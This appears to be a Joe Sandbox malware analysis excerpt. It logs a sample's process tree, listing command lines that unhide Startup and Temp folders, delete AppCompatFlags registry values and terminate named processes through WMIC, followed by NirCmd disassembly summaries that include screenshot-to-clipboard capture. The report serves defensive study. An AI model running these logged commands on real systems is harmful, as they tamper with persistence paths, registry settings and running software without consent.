Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NirCmd, Description: Yara detected NirCmd tool, Source: 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	12:09:00
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\timeout.exe /t 1
Imagebase:	0x560000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	12:09:00
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0xd20000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	12:09:01
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\timeout.exe /t 1
Imagebase:	0x560000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	12:09:02
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\timeout.exe /t 1
Imagebase:	0x560000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	12:09:03
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\reg.exe query "HKCU\Software\Microsoft\Windows"
Imagebase:	0x520000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	12:09:03
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\attrib.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\."
Imagebase:	0x930000
File size:	19'456 bytes
MD5 hash:	0E938DD280E83B1596EC6AA48729C2B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: attrib.exePID: 6096, Parent PID: 4296

General

Target ID:	30
Start time:	12:09:03
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\attrib.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\."
Imagebase:	0x930000
File size:	19'456 bytes
MD5 hash:	0E938DD280E83B1596EC6AA48729C2B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: reg.exePID: 6416, Parent PID: 4296

General

Target ID:	31
Start time:	12:09:03
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\reg.exe delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f
Imagebase:	0x520000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	12:09:03
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\reg.exe delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f /reg:64
Imagebase:	0x520000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	12:09:03
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f
Imagebase:	0x520000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	12:09:03
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f /reg:64
Imagebase:	0x520000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	12:09:03
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline
Imagebase:	0xc70000
File size:	427'008 bytes
MD5 hash:	E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	12:09:03
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /i /c:"RtkAudio"
Imagebase:	0x710000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: WMIC.exePID: 7044, Parent PID: 4296

General

Target ID:	37
Start time:	12:09:04
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\wbem\WMIC.exe process where "name like '%RtkAudio.exe%'" Call Terminate
Imagebase:	0xc70000
File size:	427'008 bytes
MD5 hash:	E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	12:09:04
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\wbem\WMIC.exe process where "name like '%IntelSvc.exe%'" Call Terminate
Imagebase:	0xc70000
File size:	427'008 bytes
MD5 hash:	E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	12:09:05
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\wbem\WMIC.exe process where "name like '%Systemfont.exe%'" Call Terminate
Imagebase:	0xc70000
File size:	427'008 bytes
MD5 hash:	E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	12:09:06
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\wbem\WMIC.exe process where "name like '%palemoon.exe%'" Call Terminate
Imagebase:	0xc70000
File size:	427'008 bytes
MD5 hash:	E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	12:09:06
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\wbem\WMIC.exe process where "name like '%screen.exe%'" Call Terminate
Imagebase:	0xc70000
File size:	427'008 bytes
MD5 hash:	E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	12:09:08
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\wbem\WMIC.exe process where "name like '%choice.exe%'" Call Terminate
Imagebase:	0xc70000
File size:	427'008 bytes
MD5 hash:	E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	12:09:08
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\wbem\WMIC.exe process where "name like '%fontdrvhots.exe%'" Call Terminate
Imagebase:	0xc70000
File size:	427'008 bytes
MD5 hash:	E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	12:09:09
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\wbem\WMIC.exe process where "name like '%tv_x86.exe%'" Call Terminate
Imagebase:	0xc70000
File size:	427'008 bytes
MD5 hash:	E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	12:09:11
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\attrib.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\."
Imagebase:	0x930000
File size:	19'456 bytes
MD5 hash:	0E938DD280E83B1596EC6AA48729C2B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	12:09:11
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\attrib.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\Tweaker\."
Imagebase:	0x930000
File size:	19'456 bytes
MD5 hash:	0E938DD280E83B1596EC6AA48729C2B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: attrib.exePID: 5740, Parent PID: 4296

General

Target ID:	48
Start time:	12:09:11
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\attrib.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\."
Imagebase:	0x930000
File size:	19'456 bytes
MD5 hash:	0E938DD280E83B1596EC6AA48729C2B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: attrib.exePID: 6252, Parent PID: 4296

General

Target ID:	49
Start time:	12:09:11
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\attrib.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\."
Imagebase:	0x930000
File size:	19'456 bytes
MD5 hash:	0E938DD280E83B1596EC6AA48729C2B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: attrib.exePID: 728, Parent PID: 4296

General

Target ID:	50
Start time:	12:09:11
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\attrib.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\."
Imagebase:	0x930000
File size:	19'456 bytes
MD5 hash:	0E938DD280E83B1596EC6AA48729C2B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: Conhost.exePID: 5576, Parent PID: 3576

General

Target ID:	77
Start time:	12:09:12
Start date:	04/07/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: Conhost.exePID: 4024, Parent PID: 6604

General

Target ID:	203
Start time:	12:09:29
Start date:	04/07/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Disassembly

Reset < >

Analysis Process: screen.exePID: 6668, Parent PID: 4296COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7.5%
Total number of Nodes:	1917
Total number of Limit Nodes:	7

Executed Functions

Function 00407701 Relevance: 66.8, APIs: 25, Strings: 13, Instructions: 318
stringwindowthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00407735
GetWindowTextA.USER32(?,?,000003FF), ref: 00407749
strlen.MSVCRT ref: 00407758
_strcmpi.MSVCRT ref: 00407791
_strnicmp.MSVCRT ref: 004077CB
strlen.MSVCRT ref: 00407825
strlen.MSVCRT ref: 0040783D
_strnicmp.MSVCRT ref: 00407852
GetWindowLongA.USER32(?,000000F4), ref: 00407888
memset.MSVCRT ref: 004078BF
GetClassNameA.USER32(?,?,000000FF), ref: 004078D4
_strcmpi.MSVCRT ref: 004078E0
IsWindowVisible.USER32(?), ref: 0040790C
GetWindowThreadProcessId.USER32(?,00000000), ref: 00407927
memset.MSVCRT ref: 0040796B

Part of subcall function 0040DDA8: OpenProcess.KERNEL32(00000410,00000000,?,00000000,00000000,?,0040E0CB,?), ref: 0040DDD5
Part of subcall function 0040DDA8: CloseHandle.KERNEL32(00000000,?,0040E0CB,?), ref: 0040DE15

_strcmpi.MSVCRT ref: 0040798A
IsWindowVisible.USER32(?), ref: 004079CA
GetWindowRect.USER32(?,?), ref: 004079DC
IsWindowVisible.USER32(?), ref: 00407A12
memset.MSVCRT ref: 00407A32
GetClassNameA.USER32(?,?,000000FF), ref: 00407A43
_strcmpi.MSVCRT ref: 00407A53
_strcmpi.MSVCRT ref: 00407A68
_strcmpi.MSVCRT ref: 00407A7D
GetWindowRect.USER32(?,?), ref: 00407A90

Part of subcall function 00405A62: _strcmpi.MSVCRT ref: 00405A6E

Strings

title, xrefs: 00407776
ititle, xrefs: 004077DF
alltop, xrefs: 004079B3
button, xrefs: 00407A77
all, xrefs: 00407AB2
stitle, xrefs: 004077AC
etitle, xrefs: 0040780B
progman, xrefs: 00407A4D
alltopnodesktop, xrefs: 004079FA
process, xrefs: 004078F3
shell_traywnd, xrefs: 00407A62
Failed to load the process library !, xrefs: 0040799E
class, xrefs: 0040789C

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: Window$_strcmpi$memset$Visiblestrlen$ClassNameProcessRect_strnicmp$CloseHandleLongOpenTextThread
String ID: Failed to load the process library !$all$alltop$alltopnodesktop$button$class$etitle$ititle$process$progman$shell_traywnd$stitle$title
API String ID: 3655397201-424509323
Opcode ID: c64172875314b9973bf2933b0724a7f4cb4a9dc7c19dae22738bc9a285994996
Instruction ID: c00615bfcac68849f2cc46ee02f1f7611d97ee1fd9a7f97ea116384e874721cc
Opcode Fuzzy Hash: c64172875314b9973bf2933b0724a7f4cb4a9dc7c19dae22738bc9a285994996
Instruction Fuzzy Hash: 89B171B26083056BE710AF65CC85B9BBBDCEF84744F14443FF944E2191E778DA448B5A

Function 004109AE Relevance: 18.1, APIs: 12, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,00411400,00000070), ref: 004109C3
__set_app_type.MSVCRT ref: 00410A1C
__p__fmode.MSVCRT ref: 00410A31
__p__commode.MSVCRT ref: 00410A3F
__setusermatherr.MSVCRT ref: 00410A6B
_initterm.MSVCRT ref: 00410A81
__getmainargs.MSVCRT ref: 00410AA4
_initterm.MSVCRT ref: 00410AB7
GetStartupInfoA.KERNEL32(?), ref: 00410AF6
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00410B1A
exit.KERNELBASE ref: 00410B2D
_cexit.MSVCRT ref: 00410B33

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
String ID:
API String ID: 3662548030-0
Opcode ID: f07cd8281bd0eef026c145cfcef703825ef265d38ac0e4a0f6066f93efc5ebb1
Instruction ID: cc526e6bbcca00d755beed77e4c14bf94675ec1b2c2e5d9affb58e5f706cce2a
Opcode Fuzzy Hash: f07cd8281bd0eef026c145cfcef703825ef265d38ac0e4a0f6066f93efc5ebb1
Instruction Fuzzy Hash: 3941A370D05348DFDB20DFA5D8856EE7BB4AF08354F20816BE551A72A1D7B859C2CB1C

Function 004071E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowPlacement.USER32(?,?), ref: 004071F3
ShowWindow.USER32(?,00000005), ref: 00407253

Strings

,, xrefs: 004071FD

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: Window$PlacementShow
String ID: ,
API String ID: 139272362-3772416878
Opcode ID: e45384bb7b80e83c21bf432214024b70f437442ed10f215526af609af5b0b85d
Instruction ID: 488eb4e3c8cfaa75f66f03325ff8e7c41bda078349391e5383aed3a56be706e5
Opcode Fuzzy Hash: e45384bb7b80e83c21bf432214024b70f437442ed10f215526af609af5b0b85d
Instruction Fuzzy Hash: 1EE0ED32A04208EFDF109B94EC09BEDB771EB40361F208437F612B90E4D37969499A0A

Function 00407225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowPlacement.USER32(?,?), ref: 00407237
ShowWindow.USER32(?,00000005), ref: 00407253

Strings

,, xrefs: 00407241

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: Window$PlacementShow
String ID: ,
API String ID: 139272362-3772416878
Opcode ID: b9b0f01d9435d210b30eb168350d838b4fe8ab924f5220319e08e4535ea70096
Instruction ID: 0944c4d53ad902cea0407e537049be98cd47ab29d924df84caff37d8319bf5d1
Opcode Fuzzy Hash: b9b0f01d9435d210b30eb168350d838b4fe8ab924f5220319e08e4535ea70096
Instruction Fuzzy Hash: ECE0ED32A04208EFDF118B94E808BECB775AB40361F208436E602B90E4C3B95A098A06

Function 004071B2 Relevance: 3.0, APIs: 2, Instructions: 16
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsWindowVisible.USER32(?), ref: 004071B5
ShowWindow.USER32(?,00000005), ref: 00407253

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: Window$ShowVisible
String ID:
API String ID: 4185057100-0
Opcode ID: d40449464b4047ac30e2f08daab078d74676a49c2ef9bbb6d019a29481b258b7
Instruction ID: 73275c178affd846a24b2184eb31fce0e7f5b24e22b52912f637cddb3408e108
Opcode Fuzzy Hash: d40449464b4047ac30e2f08daab078d74676a49c2ef9bbb6d019a29481b258b7
Instruction Fuzzy Hash: EED09232648105EADB112B25BC09B997720AB907A6F21C037F703B90E0D67AA461AA1E

Function 004070AD Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShowWindow.USER32(?,00000005), ref: 00407253

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 8a1bec2b98c65d460e9c0dd57be8462012df7da087a7a37d62e699727b122443
Instruction ID: 226fa48927d3fdd7dc7efc31f055c4cf0843709fac406fb857b610709aab6821
Opcode Fuzzy Hash: 8a1bec2b98c65d460e9c0dd57be8462012df7da087a7a37d62e699727b122443
Instruction Fuzzy Hash: CEB09B33748104D7C7011759BC05B9C771097903B6F208537F703B40E092755451551F

Function 00406F83 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShowWindow.USER32(?,00000005), ref: 00407253

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: aee65bd171f549207724a9ea865a06be34d7caa89f0e7521b04c39c2fd2d5c7c
Instruction ID: 3233370c77f959def4cfdb733db00f5ee0b13b50270c126f6874236bb3519daa
Opcode Fuzzy Hash: aee65bd171f549207724a9ea865a06be34d7caa89f0e7521b04c39c2fd2d5c7c
Instruction Fuzzy Hash: EDB09B33748104D7C7411759FC05B9C7710A7903B5F20C537F743B40E086755455561F

Function 00406FA1 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShowWindow.USER32(?,00000005), ref: 00407253

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: fbbf48d6404762567680356dcc5cc0b4ec1ac16cbb025118edd27d81640ceccf
Instruction ID: 60922bdaa2309494e6786f783de06aba103c5ec7039c8357086265bb8e9037be
Opcode Fuzzy Hash: fbbf48d6404762567680356dcc5cc0b4ec1ac16cbb025118edd27d81640ceccf
Instruction Fuzzy Hash: 51B09233748004E7CB012B59BC09B9CB720AB903B6F208437F703B80E0827AA452A62F

Non-executed Functions

Function 0040D139 Relevance: 49.1, APIs: 26, Strings: 2, Instructions: 142clipboardwindowCOMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 0040D14B
GetDeviceCaps.GDI32 ref: 0040D15D
GetDeviceCaps.GDI32(?,0000000A), ref: 0040D16B
GetSystemMetrics.USER32(0000004C), ref: 0040D187
GetSystemMetrics.USER32(0000004D), ref: 0040D192
GetSystemMetrics.USER32(0000004E), ref: 0040D19D
GetSystemMetrics.USER32(0000004F), ref: 0040D1A8
atoi.MSVCRT ref: 0040D1C8
atoi.MSVCRT ref: 0040D1D9
atoi.MSVCRT ref: 0040D1EA
atoi.MSVCRT ref: 0040D1FB
CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040D20F
CreateCompatibleDC.GDI32(?), ref: 0040D21B
SelectObject.GDI32(00000000,?), ref: 0040D228
BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 0040D24A
_strcmpi.MSVCRT ref: 0040D25C
OpenClipboard.USER32 ref: 0040D268
EmptyClipboard.USER32 ref: 0040D276
SetClipboardData.USER32(00000002,?), ref: 0040D281
CloseClipboard.USER32 ref: 0040D287
SelectObject.GDI32(?,?), ref: 0040D293
DeleteDC.GDI32(?), ref: 0040D29C
SelectObject.GDI32(?,?), ref: 0040D2B7
DeleteDC.GDI32(?), ref: 0040D2C0
DeleteObject.GDI32(?), ref: 0040D2C9
ReleaseDC.USER32(?,?), ref: 0040D2D3

Strings

savescreenshotfull, xrefs: 0040D171
*clipboard*, xrefs: 0040D256

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: ClipboardMetricsObjectSystematoi$DeleteSelect$CapsCompatibleCreateDevice$BitmapCloseDataEmptyOpenRelease_strcmpi
String ID: *clipboard*$savescreenshotfull
